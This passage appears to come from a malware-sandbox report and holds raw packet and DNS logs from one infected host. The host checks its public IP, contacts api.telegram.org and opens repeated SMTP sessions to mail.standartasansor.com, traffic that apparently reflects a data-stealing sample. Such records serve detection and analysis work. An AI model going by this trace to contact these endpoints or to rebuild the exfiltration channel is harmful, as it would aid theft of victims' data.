                                                                                                          Jan 10, 2025 18:46:50.836958885 CET49755443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:50.838321924 CET49755443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:50.838352919 CET44349755104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:50.838635921 CET44349755104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:50.889621019 CET49755443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:50.892013073 CET49755443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:50.935324907 CET44349755104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:51.005916119 CET44349755104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:51.005976915 CET44349755104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:51.006021023 CET49755443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:51.008846998 CET49755443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:51.012773037 CET4975480192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:51.017795086 CET8049754193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:46:51.227150917 CET8049754193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:46:51.229212046 CET49756443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:51.229255915 CET44349756104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:51.229484081 CET49756443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:51.229799032 CET49756443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:51.229813099 CET44349756104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:51.280272007 CET4975480192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:51.711812019 CET44349756104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:51.713567972 CET49756443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:51.713591099 CET44349756104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:51.865588903 CET44349756104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:51.865653992 CET44349756104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:51.865772009 CET49756443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:51.868513107 CET49756443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:51.871757984 CET4975480192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:51.872991085 CET4975780192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:51.876823902 CET8049754193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:46:51.876924038 CET4975480192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:51.877911091 CET8049757193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:46:51.878108978 CET4975780192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:51.878251076 CET4975780192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:51.883080959 CET8049757193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:46:52.301496029 CET4974180192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:52.652055979 CET8049757193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:46:52.653765917 CET49758443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:52.653801918 CET44349758104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:52.653903961 CET49758443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:52.654170036 CET49758443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:52.654181004 CET44349758104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:52.702279091 CET4975780192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:52.773367882 CET49759587192.168.2.4178.210.170.40
                                                                                                          Jan 10, 2025 18:46:52.778140068 CET58749759178.210.170.40192.168.2.4
                                                                                                          Jan 10, 2025 18:46:52.778440952 CET49759587192.168.2.4178.210.170.40
                                                                                                          Jan 10, 2025 18:46:53.327390909 CET44349758104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:53.329015017 CET49758443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:53.329047918 CET44349758104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:53.603744984 CET44349758104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:53.603815079 CET44349758104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:53.603883982 CET49758443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:53.610033989 CET49758443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:53.611176968 CET58749759178.210.170.40192.168.2.4
                                                                                                          Jan 10, 2025 18:46:53.611437082 CET49759587192.168.2.4178.210.170.40
                                                                                                          Jan 10, 2025 18:46:53.616261959 CET58749759178.210.170.40192.168.2.4
                                                                                                          Jan 10, 2025 18:46:53.617573023 CET4976080192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:53.622453928 CET8049760193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:46:53.622531891 CET4976080192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:53.622620106 CET4976080192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:53.627409935 CET8049760193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:46:53.832989931 CET58749759178.210.170.40192.168.2.4
                                                                                                          Jan 10, 2025 18:46:53.834193945 CET49759587192.168.2.4178.210.170.40
                                                                                                          Jan 10, 2025 18:46:53.839164019 CET58749759178.210.170.40192.168.2.4
                                                                                                          Jan 10, 2025 18:46:54.063441992 CET58749759178.210.170.40192.168.2.4
                                                                                                          Jan 10, 2025 18:46:54.063697100 CET49759587192.168.2.4178.210.170.40
                                                                                                          Jan 10, 2025 18:46:54.068612099 CET58749759178.210.170.40192.168.2.4
                                                                                                          Jan 10, 2025 18:46:54.263209105 CET8049760193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:46:54.265014887 CET49761443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:54.265058994 CET44349761104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:54.265136003 CET49761443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:54.265398026 CET49761443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:54.265408993 CET44349761104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:54.307893991 CET58749759178.210.170.40192.168.2.4
                                                                                                          Jan 10, 2025 18:46:54.308298111 CET49759587192.168.2.4178.210.170.40
                                                                                                          Jan 10, 2025 18:46:54.311517000 CET4976080192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:54.313056946 CET58749759178.210.170.40192.168.2.4
                                                                                                          Jan 10, 2025 18:46:54.530957937 CET58749759178.210.170.40192.168.2.4
                                                                                                          Jan 10, 2025 18:46:54.531132936 CET49759587192.168.2.4178.210.170.40
                                                                                                          Jan 10, 2025 18:46:54.535955906 CET58749759178.210.170.40192.168.2.4
                                                                                                          Jan 10, 2025 18:46:54.779189110 CET58749759178.210.170.40192.168.2.4
                                                                                                          Jan 10, 2025 18:46:54.779405117 CET49759587192.168.2.4178.210.170.40
                                                                                                          Jan 10, 2025 18:46:54.784240961 CET58749759178.210.170.40192.168.2.4
                                                                                                          Jan 10, 2025 18:46:54.851583958 CET44349761104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:54.853080988 CET49761443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:54.853105068 CET44349761104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:54.993686914 CET44349761104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:54.993743896 CET44349761104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:54.993843079 CET49761443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:54.994589090 CET49761443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:54.998228073 CET4976080192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:54.999231100 CET4976280192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:55.003246069 CET8049760193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:46:55.003300905 CET4976080192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:55.003963947 CET8049762193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:46:55.004017115 CET4976280192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:55.004106998 CET4976280192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:55.009474993 CET8049762193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:46:55.030709028 CET58749759178.210.170.40192.168.2.4
                                                                                                          Jan 10, 2025 18:46:55.031269073 CET49759587192.168.2.4178.210.170.40
                                                                                                          Jan 10, 2025 18:46:55.031367064 CET49759587192.168.2.4178.210.170.40
                                                                                                          Jan 10, 2025 18:46:55.031478882 CET49759587192.168.2.4178.210.170.40
                                                                                                          Jan 10, 2025 18:46:55.031491995 CET49759587192.168.2.4178.210.170.40
                                                                                                          Jan 10, 2025 18:46:55.031516075 CET49759587192.168.2.4178.210.170.40
                                                                                                          Jan 10, 2025 18:46:55.036016941 CET58749759178.210.170.40192.168.2.4
                                                                                                          Jan 10, 2025 18:46:55.036120892 CET58749759178.210.170.40192.168.2.4
                                                                                                          Jan 10, 2025 18:46:55.036132097 CET58749759178.210.170.40192.168.2.4
                                                                                                          Jan 10, 2025 18:46:55.036298037 CET58749759178.210.170.40192.168.2.4
                                                                                                          Jan 10, 2025 18:46:55.036308050 CET58749759178.210.170.40192.168.2.4
                                                                                                          Jan 10, 2025 18:46:55.036376953 CET58749759178.210.170.40192.168.2.4
                                                                                                          Jan 10, 2025 18:46:55.036386013 CET58749759178.210.170.40192.168.2.4
                                                                                                          Jan 10, 2025 18:46:55.036437035 CET58749759178.210.170.40192.168.2.4
                                                                                                          Jan 10, 2025 18:46:55.036473989 CET58749759178.210.170.40192.168.2.4
                                                                                                          Jan 10, 2025 18:46:55.036482096 CET58749759178.210.170.40192.168.2.4
                                                                                                          Jan 10, 2025 18:46:55.268027067 CET58749759178.210.170.40192.168.2.4
                                                                                                          Jan 10, 2025 18:46:55.311510086 CET49759587192.168.2.4178.210.170.40
                                                                                                          Jan 10, 2025 18:46:55.670500994 CET8049762193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:46:55.672485113 CET49763443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:55.672523975 CET44349763104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:55.672570944 CET49763443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:55.673084974 CET49763443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:55.673094034 CET44349763104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:55.717751980 CET4976280192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:56.157469988 CET44349763104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:56.159331083 CET49763443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:56.159364939 CET44349763104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:56.318106890 CET44349763104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:56.318170071 CET44349763104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:56.318234921 CET49763443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:56.318749905 CET49763443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:56.325175047 CET4976280192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:56.326241970 CET4976480192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:56.330147028 CET8049762193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:46:56.330200911 CET4976280192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:56.331053019 CET8049764193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:46:56.331186056 CET4976480192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:56.331399918 CET4976480192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:56.336204052 CET8049764193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:46:56.980945110 CET8049764193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:46:56.982180119 CET49765443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:56.982233047 CET44349765104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:56.982296944 CET49765443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:56.982537985 CET49765443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:56.982552052 CET44349765104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:57.030312061 CET4976480192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:57.446733952 CET44349765104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:57.448781967 CET49765443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:57.448822021 CET44349765104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:57.601298094 CET44349765104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:57.601366997 CET44349765104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:57.601440907 CET49765443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:57.601927996 CET49765443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:57.604739904 CET4976480192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:57.605953932 CET4976680192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:57.609776974 CET8049764193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:46:57.609847069 CET4976480192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:57.610809088 CET8049766193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:46:57.610887051 CET4976680192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:57.610989094 CET4976680192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:57.615798950 CET8049766193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:46:58.275707960 CET8049766193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:46:58.280836105 CET49767443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:58.280889988 CET44349767104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:58.280945063 CET49767443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:58.281505108 CET49767443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:58.281517029 CET44349767104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:58.327127934 CET4976680192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:58.775954008 CET44349767104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:58.777653933 CET49767443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:58.777690887 CET44349767104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:58.927190065 CET44349767104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:58.927259922 CET44349767104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:58.927341938 CET49767443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:58.927812099 CET49767443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:58.930835962 CET4976680192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:58.931997061 CET4976880192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:58.935786963 CET8049766193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:46:58.935841084 CET4976680192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:58.936887026 CET8049768193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:46:58.936947107 CET4976880192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:58.937040091 CET4976880192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:46:58.941781044 CET8049768193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:46:59.748574018 CET8049768193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:46:59.749933004 CET49769443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:59.749969959 CET44349769104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:59.750057936 CET49769443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:59.750289917 CET49769443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:46:59.750300884 CET44349769104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:59.795943975 CET4976880192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:47:00.258790016 CET44349769104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:47:00.263103962 CET49769443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:47:00.263120890 CET44349769104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:47:00.417886019 CET44349769104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:47:00.417949915 CET44349769104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:47:00.418133974 CET49769443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:47:00.418597937 CET49769443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:47:00.421994925 CET4976880192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:47:00.422569990 CET4977080192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:47:00.426992893 CET8049768193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:47:00.427088976 CET4976880192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:47:00.427308083 CET8049770193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:47:00.427370071 CET4977080192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:47:00.427499056 CET4977080192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:47:00.432262897 CET8049770193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:47:01.063929081 CET8049770193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:47:01.065346003 CET49771443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:47:01.065391064 CET44349771104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:47:01.065485954 CET49771443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:47:01.065738916 CET49771443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:47:01.065752983 CET44349771104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:47:01.108480930 CET4977080192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:47:01.644351959 CET44349771104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:47:01.646074057 CET49771443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:47:01.646091938 CET44349771104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:47:01.758380890 CET44349771104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:47:01.758570910 CET44349771104.21.64.1192.168.2.4
                                                                                                          Jan 10, 2025 18:47:01.758680105 CET49771443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:47:01.759118080 CET49771443192.168.2.4104.21.64.1
                                                                                                          Jan 10, 2025 18:47:01.768516064 CET4977080192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:47:01.769434929 CET49772443192.168.2.4149.154.167.220
                                                                                                          Jan 10, 2025 18:47:01.769476891 CET44349772149.154.167.220192.168.2.4
                                                                                                          Jan 10, 2025 18:47:01.769771099 CET49772443192.168.2.4149.154.167.220
                                                                                                          Jan 10, 2025 18:47:01.770155907 CET49772443192.168.2.4149.154.167.220
                                                                                                          Jan 10, 2025 18:47:01.770165920 CET44349772149.154.167.220192.168.2.4
                                                                                                          Jan 10, 2025 18:47:01.773595095 CET8049770193.122.6.168192.168.2.4
                                                                                                          Jan 10, 2025 18:47:01.773648977 CET4977080192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:47:02.402518988 CET44349772149.154.167.220192.168.2.4
                                                                                                          Jan 10, 2025 18:47:02.402625084 CET49772443192.168.2.4149.154.167.220
                                                                                                          Jan 10, 2025 18:47:02.404082060 CET49772443192.168.2.4149.154.167.220
                                                                                                          Jan 10, 2025 18:47:02.404099941 CET44349772149.154.167.220192.168.2.4
                                                                                                          Jan 10, 2025 18:47:02.404316902 CET44349772149.154.167.220192.168.2.4
                                                                                                          Jan 10, 2025 18:47:02.406124115 CET49772443192.168.2.4149.154.167.220
                                                                                                          Jan 10, 2025 18:47:02.447333097 CET44349772149.154.167.220192.168.2.4
                                                                                                          Jan 10, 2025 18:47:02.653343916 CET44349772149.154.167.220192.168.2.4
                                                                                                          Jan 10, 2025 18:47:02.653413057 CET44349772149.154.167.220192.168.2.4
                                                                                                          Jan 10, 2025 18:47:02.653459072 CET49772443192.168.2.4149.154.167.220
                                                                                                          Jan 10, 2025 18:47:02.665769100 CET49772443192.168.2.4149.154.167.220
                                                                                                          Jan 10, 2025 18:47:07.899998903 CET4975780192.168.2.4193.122.6.168
                                                                                                          Jan 10, 2025 18:47:08.036043882 CET49773587192.168.2.4178.210.170.40
                                                                                                          Jan 10, 2025 18:47:08.040905952 CET58749773178.210.170.40192.168.2.4
                                                                                                          Jan 10, 2025 18:47:08.040983915 CET49773587192.168.2.4178.210.170.40
                                                                                                          Jan 10, 2025 18:47:08.671487093 CET58749773178.210.170.40192.168.2.4
                                                                                                          Jan 10, 2025 18:47:08.671659946 CET49773587192.168.2.4178.210.170.40
                                                                                                          Jan 10, 2025 18:47:08.676460981 CET58749773178.210.170.40192.168.2.4
                                                                                                          Jan 10, 2025 18:47:08.930634022 CET58749773178.210.170.40192.168.2.4
                                                                                                          Jan 10, 2025 18:47:08.930921078 CET49773587192.168.2.4178.210.170.40
                                                                                                          Jan 10, 2025 18:47:08.935728073 CET58749773178.210.170.40192.168.2.4
                                                                                                          Jan 10, 2025 18:47:09.167845964 CET58749773178.210.170.40192.168.2.4
                                                                                                          Jan 10, 2025 18:47:09.168138027 CET49773587192.168.2.4178.210.170.40
                                                                                                          Jan 10, 2025 18:47:09.172945023 CET58749773178.210.170.40192.168.2.4
                                                                                                          Jan 10, 2025 18:47:09.397497892 CET58749773178.210.170.40192.168.2.4
                                                                                                          Jan 10, 2025 18:47:09.397691965 CET49773587192.168.2.4178.210.170.40
                                                                                                          Jan 10, 2025 18:47:09.403825045 CET58749773178.210.170.40192.168.2.4
                                                                                                          Jan 10, 2025 18:47:09.619775057 CET58749773178.210.170.40192.168.2.4
                                                                                                          Jan 10, 2025 18:47:09.619944096 CET49773587192.168.2.4178.210.170.40
                                                                                                          Jan 10, 2025 18:47:09.624716043 CET58749773178.210.170.40192.168.2.4
                                                                                                          Jan 10, 2025 18:47:09.843091965 CET58749773178.210.170.40192.168.2.4
                                                                                                          Jan 10, 2025 18:47:09.843266964 CET49773587192.168.2.4178.210.170.40
                                                                                                          Jan 10, 2025 18:47:09.848040104 CET58749773178.210.170.40192.168.2.4
                                                                                                          Jan 10, 2025 18:47:10.105071068 CET58749773178.210.170.40192.168.2.4
                                                                                                          Jan 10, 2025 18:47:10.105802059 CET49773587192.168.2.4178.210.170.40
                                                                                                          Jan 10, 2025 18:47:10.105879068 CET49773587192.168.2.4178.210.170.40
                                                                                                          Jan 10, 2025 18:47:10.106029034 CET49773587192.168.2.4178.210.170.40
                                                                                                          Jan 10, 2025 18:47:10.106029034 CET49773587192.168.2.4178.210.170.40
                                                                                                          Jan 10, 2025 18:47:10.106046915 CET49773587192.168.2.4178.210.170.40
                                                                                                          Jan 10, 2025 18:47:10.110563040 CET58749773178.210.170.40192.168.2.4
                                                                                                          Jan 10, 2025 18:47:10.110646009 CET58749773178.210.170.40192.168.2.4
                                                                                                          Jan 10, 2025 18:47:10.110766888 CET58749773178.210.170.40192.168.2.4
                                                                                                          Jan 10, 2025 18:47:10.110841990 CET58749773178.210.170.40192.168.2.4
                                                                                                          Jan 10, 2025 18:47:10.110851049 CET58749773178.210.170.40192.168.2.4
                                                                                                          Jan 10, 2025 18:47:10.110881090 CET58749773178.210.170.40192.168.2.4
                                                                                                          Jan 10, 2025 18:47:10.110889912 CET58749773178.210.170.40192.168.2.4
                                                                                                          Jan 10, 2025 18:47:10.111016035 CET58749773178.210.170.40192.168.2.4
                                                                                                          Jan 10, 2025 18:47:10.111025095 CET58749773178.210.170.40192.168.2.4
                                                                                                          Jan 10, 2025 18:47:10.111032963 CET58749773178.210.170.40192.168.2.4
                                                                                                          Jan 10, 2025 18:47:10.488493919 CET58749773178.210.170.40192.168.2.4
                                                                                                          Jan 10, 2025 18:47:10.530479908 CET49773587192.168.2.4178.210.170.40
                                                                                                          Jan 10, 2025 18:47:12.772139072 CET5466353192.168.2.4162.159.36.2
                                                                                                          Jan 10, 2025 18:47:12.776983976 CET5354663162.159.36.2192.168.2.4
                                                                                                          Jan 10, 2025 18:47:12.777055979 CET5466353192.168.2.4162.159.36.2
                                                                                                          Jan 10, 2025 18:47:12.781850100 CET5354663162.159.36.2192.168.2.4
                                                                                                          Jan 10, 2025 18:47:13.278953075 CET5466353192.168.2.4162.159.36.2
                                                                                                          Jan 10, 2025 18:47:13.284190893 CET5354663162.159.36.2192.168.2.4
                                                                                                          Jan 10, 2025 18:47:13.284295082 CET5466353192.168.2.4162.159.36.2
                                                                                                          Jan 10, 2025 18:48:32.499456882 CET49759587192.168.2.4178.210.170.40
                                                                                                          Jan 10, 2025 18:48:32.504468918 CET58749759178.210.170.40192.168.2.4
                                                                                                          Jan 10, 2025 18:48:32.721909046 CET58749759178.210.170.40192.168.2.4
                                                                                                          Jan 10, 2025 18:48:32.722207069 CET49759587192.168.2.4178.210.170.40
                                                                                                          Jan 10, 2025 18:48:32.727385998 CET58749759178.210.170.40192.168.2.4
                                                                                                          Jan 10, 2025 18:48:32.727510929 CET49759587192.168.2.4178.210.170.40

                                                                                                          UDP Packets

                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          Jan 10, 2025 18:46:34.021141052 CET6307853192.168.2.41.1.1.1
                                                                                                          Jan 10, 2025 18:46:34.028306007 CET53630781.1.1.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:35.041728020 CET6534153192.168.2.41.1.1.1
                                                                                                          Jan 10, 2025 18:46:35.049424887 CET53653411.1.1.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:46.139118910 CET5156853192.168.2.41.1.1.1
                                                                                                          Jan 10, 2025 18:46:46.145946980 CET53515681.1.1.1192.168.2.4
                                                                                                          Jan 10, 2025 18:46:52.472429991 CET5554553192.168.2.41.1.1.1
                                                                                                          Jan 10, 2025 18:46:52.772402048 CET53555451.1.1.1192.168.2.4
                                                                                                          Jan 10, 2025 18:47:12.771651983 CET5358412162.159.36.2192.168.2.4
                                                                                                          Jan 10, 2025 18:47:13.463980913 CET53537981.1.1.1192.168.2.4

                                                                                                          DNS Queries

                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                          Jan 10, 2025 18:46:34.021141052 CET192.168.2.41.1.1.10x1129Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                          Jan 10, 2025 18:46:35.041728020 CET192.168.2.41.1.1.10x413Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                          Jan 10, 2025 18:46:46.139118910 CET192.168.2.41.1.1.10x4737Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                          Jan 10, 2025 18:46:52.472429991 CET192.168.2.41.1.1.10x902eStandard query (0)mail.standartasansor.comA (IP address)IN (0x0001)false

                                                                                                          DNS Answers

                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                          Jan 10, 2025 18:46:34.028306007 CET1.1.1.1192.168.2.40x1129No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                          Jan 10, 2025 18:46:34.028306007 CET1.1.1.1192.168.2.40x1129No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                          Jan 10, 2025 18:46:34.028306007 CET1.1.1.1192.168.2.40x1129No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                          Jan 10, 2025 18:46:34.028306007 CET1.1.1.1192.168.2.40x1129No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
